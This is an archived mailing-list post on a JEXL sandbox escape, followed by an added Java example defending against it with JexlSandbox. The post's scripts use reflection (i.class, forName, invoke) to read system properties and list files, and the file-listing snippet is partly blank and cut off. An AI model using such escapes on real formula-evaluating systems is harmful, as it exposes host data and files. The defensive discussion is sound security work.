commons-user mailing list archives

From "Trevor Harrison" <>
Subject Re: JEXL security issue with system properties
Date Fri, 05 Oct 2007 15:42:41 GMT
Replying to myself:

On 10/4/07, Trevor Harrison <> wrote:
> While looking for other ways to 'break' out, I started thinking about
> classloaders.  I haven't succeeded in getting a classloader yet in a
> script, but if I could, it would be bad for my intended usage of JEXL
> (as a fairly secure way of executing user supplied formulas).
> // this doesn't work
> cl = intClazz.getClassLoader();  // this fails, returns a null

Well, still not sure why that method is returning a null for the
classloader, but if I call (the much simpler) clazz.forName(), I can
get a reference to a class:

i = 0;
intClazz = i.class;
clazz = intClazz.forName("java.lang.System");
m = clazz.getMethod("getProperties", null);
p = m.invoke(null, null);

which successfully gets me the system properties.  Which is probably
the least of my worries, considering I could do something like:

i = 0;
intClazz = i.class;
clazz = intClazz.forName("");
m = clazz.getMethod("listRoots", null);
roots = m.invoke(null, null);
files = roots[0].listFiles();
foreach( file in files )

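The escape in the message above rests on two steps: reaching a java.lang.Class object from any value (i.class), then calling Class.forName and Method.invoke on it to run arbitrary static methods. The following is an added example, not code from the thread or from the JEXL project, showing how the same escape is rejected when the engine is built with a block-by-default JexlSandbox, while a plain arithmetic formula still evaluates. It assumes the JEXL 3.x API (org.apache.commons.jexl3, JexlBuilder, JexlSandbox); the JEXL 1.x engine discussed in the thread has no such sandbox. The class name JexlEscapeDemo, the script strings and the variable x are the example's own.

```java
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlException;
import org.apache.commons.jexl3.JexlScript;
import org.apache.commons.jexl3.MapContext;
import org.apache.commons.jexl3.introspection.JexlSandbox;

// Added example (assumes JEXL 3.x): the Class.forName / Method.invoke escape
// from the thread, run once without and once with a block-by-default sandbox.
public class JexlEscapeDemo {

    // The escape from the message, in JEXL 3 syntax: any value yields its Class,
    // Class.forName reaches java.lang.System, reflection calls getProperties().
    static final String ESCAPE =
          "i = 0;"
        + "intClazz = i.class;"
        + "clazz = intClazz.forName('java.lang.System');"
        + "clazz.getMethod('getProperties').invoke(null);";

    // The kind of user-supplied formula the sandbox must still allow.
    // Arithmetic is handled by JexlArithmetic, not by reflection, so it needs
    // no class permissions at all.
    static final String FORMULA = "x * 2 + 1";

    // strict + not silent: unresolvable properties/methods throw instead of
    // silently evaluating to null, so a blocked call is visible to the caller.
    static JexlEngine unsandboxed() {
        return new JexlBuilder().strict(true).silent(false).create();
    }

    static JexlEngine sandboxed() {
        // JexlSandbox(false): every class not explicitly permitted is blocked,
        // so neither Integer.getClass() (the 'class' property) nor Class.forName
        // nor Method.invoke can be resolved by the introspector.
        JexlSandbox sandbox = new JexlSandbox(false);
        return new JexlBuilder()
                .sandbox(sandbox)
                .strict(true)
                .silent(false)
                .create();
    }

    static Object run(JexlEngine jexl, String source, Map<String, Object> vars) {
        JexlScript script = jexl.createScript(source);
        JexlContext ctx = new MapContext(vars);
        return script.execute(ctx);
    }

    public static void main(String[] args) {
        Map<String, Object> vars = new HashMap<>();
        vars.put("x", 20);

        // 1. Engine with default settings: on JEXL versions that allow
        //    reflection by default, this returns the live java.util.Properties.
        try {
            Object props = run(unsandboxed(), ESCAPE, vars);
            System.out.println("unsandboxed escape returned: " + props);
        } catch (JexlException e) {
            System.out.println("default engine already rejects the escape: " + e.getMessage());
        }

        // 2. Sandboxed engine: the formula works, the escape is rejected.
        JexlEngine safe = sandboxed();
        System.out.println("sandboxed formula x*2+1 = " + run(safe, FORMULA, vars));
        try {
            run(safe, ESCAPE, vars);
            System.out.println("BUG: sandbox did not block the escape");
        } catch (JexlException e) {
            // Expected: the 'class' property on Integer is unsolvable under the
            // block-by-default sandbox, so the script never reaches forName.
            System.out.println("sandbox blocked the escape: " + e.getMessage());
        }
    }
}
```

The sandbox is only as good as its allow-list: if you later permit a class for a formula (say a math helper), grant it with JexlSandbox permissions limited to the specific methods needed rather than the whole class, and keep java.lang.Class, java.lang.reflect.* and ClassLoader off the list entirely, since any of them reopens the path shown in the thread. Newer JEXL releases also ship with restrictive default permissions, so the first run above may already be rejected there; the sandboxed run is the behaviour to rely on regardless of version.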